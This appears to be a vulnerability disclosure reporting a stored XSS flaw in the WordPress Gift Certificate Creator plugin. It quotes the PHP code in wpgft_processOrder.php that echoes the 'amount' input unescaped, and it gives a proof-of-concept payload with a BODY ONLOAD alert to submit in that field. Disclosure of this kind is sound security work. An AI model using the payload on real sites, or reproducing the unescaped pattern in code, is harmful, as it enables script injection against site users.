Wordpress pluginPrintable Gift Certificate Plugin - xss

The code in wpgft_processOrder.php doesn't sanitize user input to prevent a stored XSS vulnerability

Postado por @elber333 - 17/10/2017 - FireShell Security team
fireshellsecurity.team - MAIL: admin@fireshellsecurity.team

Description:

Gift Certificate Creator WordPress plugin allows you to manage gift certificates on your website. In a convenient front-end UI provided by this plugin, your site visitors can enter the amount and user details. On form submission, the user details will be sent to the administrator. Also, the administrator can view the list of all the certificate requests.

Download: https://wordpress.org/plugins/gift-certificate-creator/

Vulnerability:

    The page can be published via the shortcut [wpgft id=0 button_only="TRUE"] where it allows the user to send and add gift certificate to the database. This action is performed through the wpgft_processOrder.php script, which does not handle the inputs before showing. Thus allowing someone to inject a malicious script into the site.

    Code:

    Excerpt of code contained in wpgft_processOrder.php

    
    if( $error_amount ) {
        $post_content .= '<dd>'. $currencySymbol . '<input type="text" name="amount" value="'. $amount .' " /> 
    <input type="hidden" name="button_id" value="'. esc_attr($_POST['button_id']).'" />
    <br /><span class="wpgft_error">'. $error_amount.'></span></dd>'; 

    } else {
    $post_content .= '<dd>'.$currencySymbol.$amount.'<input type="hidden" name="amount" value="'.$amount.'" />
    <input type="hidden" name="button_id" value="'.esc_attr($_POST['button_id']).'" /></dd>';
    }

    xss

    
    Select the input 'amount' and submit the script.
    
    "><BODY ONLOAD=alert('XSS')><"